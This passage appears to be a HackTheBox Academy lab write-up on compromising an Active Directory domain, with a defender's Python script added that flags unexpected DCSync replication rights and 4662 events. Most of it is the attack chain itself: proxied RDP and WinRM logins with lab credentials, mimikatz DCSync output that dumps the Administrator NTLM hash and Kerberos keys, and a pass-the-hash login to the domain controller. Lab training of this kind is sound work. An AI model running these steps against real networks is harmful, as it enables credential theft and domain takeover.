BinaryLength           : 56
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-5-21-2270287766-1317258649-2146029398-4607
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None
Looking up the GUIDs below online shows they are the replication rights that enable a DCSync attack:
1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
89e95b76-444d-4c62-991a-0facbeda640c
Replicating Directory Changes + Replicating Directory Changes All (with ExtendedRight on the domain object)
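Those three control-access GUIDs are the thing to audit for and to alert on. The block below is an added example (not from the writeup or PowerView) with two defender checks: audit_replication_aces() takes ACE records shaped like the Get-DomainObjectACL output above and lists principals outside a baseline allowlist that hold DS-Replication-Get-Changes-All on the domain object; detect_dcsync_4662() walks Security event 4662 records and flags any replication access that did not come from a domain controller's computer account. All records, SIDs and names are constructed to mirror the writeup; the allowlist is an assumed starting point that must be tuned to the real domain, and 4662 only appears if Directory Service Access auditing is enabled on the domain object.

```python
"""DCSync from the defender's side: who holds replication rights, and who just used them.

Added example, not from the original writeup. Records below are constructed;
the SIDs and names mirror the writeup, the allowlist is an assumption.
"""

REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DOMAIN_SID = "S-1-5-21-2270287766-1317258649-2146029398"
# Assumed baseline of principals that hold replication rights by design:
# Enterprise Domain Controllers, BUILTIN\Administrators, Domain Controllers,
# Enterprise Admins. Tune this for the real domain (Azure AD Connect, etc.).
EXPECTED_SIDS = {"S-1-5-9", "S-1-5-32-544", DOMAIN_SID + "-516", DOMAIN_SID + "-519"}

CONSTRUCTED_ACES = [  # shaped like the Get-DomainObjectACL records above
    {"ObjectDN": "DC=INLANEFREIGHT,DC=LOCAL", "ObjectAceType": GET_CHANGES_ALL,
     "SecurityIdentifier": "S-1-5-32-544", "AceQualifier": "AccessAllowed"},
    {"ObjectDN": "DC=INLANEFREIGHT,DC=LOCAL", "ObjectAceType": GET_CHANGES_ALL,
     "SecurityIdentifier": DOMAIN_SID + "-516", "AceQualifier": "AccessAllowed"},
    {"ObjectDN": "DC=INLANEFREIGHT,DC=LOCAL", "ObjectAceType": "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
     "SecurityIdentifier": DOMAIN_SID + "-4607", "AceQualifier": "AccessAllowed"},
    {"ObjectDN": "DC=INLANEFREIGHT,DC=LOCAL", "ObjectAceType": GET_CHANGES_ALL,
     "SecurityIdentifier": DOMAIN_SID + "-4607", "AceQualifier": "AccessAllowed"},
]

CONSTRUCTED_4662 = [  # Security 4662 fields; ObjectType is the domainDNS class GUID
    {"SubjectUserName": "DC02$", "SubjectDomainName": "INLANEFREIGHT",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "tpetty", "SubjectDomainName": "INLANEFREIGHT",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "tpetty", "SubjectDomainName": "INLANEFREIGHT",
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}", "AccessMask": "0x10",
     "Properties": "%%7684 {bf967aba-0de6-11d0-a285-00aa003049e2}"},  # ordinary read of a user object
]


def audit_replication_aces(aces, expected=EXPECTED_SIDS) -> dict:
    """SIDs granted Get-Changes-All that are not in the expected baseline, keyed by SID."""
    unexpected = {}
    for ace in aces:
        if ace.get("ObjectAceType", "").lower() != GET_CHANGES_ALL:
            continue
        if ace.get("AceQualifier") != "AccessAllowed":
            continue
        sid = ace["SecurityIdentifier"]
        if sid not in expected:
            unexpected[sid] = ace["ObjectDN"]
    return unexpected


def detect_dcsync_4662(events, dc_accounts) -> list:
    """4662 events where a non-DC account exercised a replication control-access right."""
    dc_names = {a.upper() for a in dc_accounts}
    hits = []
    for ev in events:
        props = ev.get("Properties", "").lower()
        used = [name for guid, name in REPLICATION_GUIDS.items() if guid in props]
        if not used or ev["SubjectUserName"].upper() in dc_names:
            continue  # nothing replication-related, or normal DC-to-DC replication
        hits.append({"actor": f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}", "rights": used})
    return hits


if __name__ == "__main__":
    print("unexpected Get-Changes-All holders:", audit_replication_aces(CONSTRUCTED_ACES))
    print("replication by non-DC accounts:", detect_dcsync_4662(CONSTRUCTED_4662, {"DC01$", "DC02$"}))
```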
I connect to the host via RDP:
┌─[eu-academy-1]─[10.10.14.30]─[htb-ac-2510340@htb-hnkzcchgmi]─[~]
└──╼ [★]$ proxychains xfreerdp /v:172.16.6.50 /u:svc_sql /p:lucky7 /size:600x550
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:3389 ... OK
Then I ran runas /user:INLANEFREIGHT\tpetty powershell.exe, which opens another PowerShell window running as tpetty.
To go further I need mimikatz on the host, so I connected via evil-winrm, which makes uploading files easy, and uploaded mimikatz into the tpetty directory for easy access:
proxychains evil-winrm -i 172.16.6.50 -u svc_sql -p lucky7
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
*Evil-WinRM* PS C:\Users\svc_sql.INLANEFREIGHT\Documents> cd C:\
*Evil-WinRM* PS C:\> cd Users
*Evil-WinRM* PS C:\Users> cd tpetty
Then I run mimikatz in the PowerShell window running as tpetty:
PS C:\Users\tpetty> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz #
Once mimikatz is running you should see the mimikatz # prompt; then run privilege::debug:
mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
Then run lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator to get the Domain Admin hash. The privilege::debug error only means tpetty does not hold SeDebugPrivilege on MS01; DCSync does not need it, since it relies on the replication rights shown above rather than on touching LSASS:
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration   :
Password last change : 4/11/2022 9:24:49 PM
Object Security ID   : S-1-5-21-2270287766-1317258649-2146029398-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 27dedb1dab4d8545c6e1c66fba077da0
    ntlm- 0: 27dedb1dab4d8545c6e1c66fba077da0
    ntlm- 1: bdaffbfe64f1fc646a3353be1c2c3c99
    lm  - 0: 757743529af55e110994f3c7e3710fc9

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : b8bcb44123b3cc3bff20c663f1e0b94d

* Primary:Kerberos-Newer-Keys *
    Default Salt : INLANEFREIGHT.LOCALAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : a76102a5617bffb1ea84ba0052767992823fd414697e81151f7de21bb41b1857
      aes128_hmac       (4096) : 69e27df2550c5c270eca1d8ce5c46230
      des_cbc_md5       (4096) : c2d9c892f2e6f2dc
    OldCredentials
      aes256_hmac       (4096) : 51d2b5ce03d6ea2e75e69050f32b927d0e602c2806dcb0d1dd0aacdda619a510
      aes128_hmac       (4096) : b93da9262f5ce0ed724ce0177366bc8a
      des_cbc_md5       (4096) : 0876d604a7087cf7
    OlderCredentials
      aes256_hmac       (4096) : 23cbc0dad348bebcbdbb4c82e9b23af299e8b56de358bafe24f2235f34497e4a
      aes128_hmac       (4096) : e35eb565af30c8ed79df5d8875508df6
      des_cbc_md5       (4096) : 4904021983252cd5

* Primary:Kerberos *
    Default Salt : INLANEFREIGHT.LOCALAdministrator
    Credentials
      des_cbc_md5       : c2d9c892f2e6f2dc
    OldCredentials
      des_cbc_md5       : 0876d604a7087cf7
Now we have the Domain Admin hash. I tried cracking it with no luck, so I decided to pass the hash with evil-winrm to log in to the DC:
─[eu-academy-1]─[10.10.14.30]─[htb-ac-2510340@htb-hnkzcchgmi]─[~]
└──╼ [★]$ proxychains evil-winrm -i 172.16.6.3 -u Administrator -H 27dedb1dab4d8545c6e1c66fba077da0
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.3:5985 ... OK
PS C:\Users\Administrator\Desktop> whoami
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.3:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.3:5985 ... OK
inlanefreight\administrator
Game Over.... Domain admin compromised!!!!!!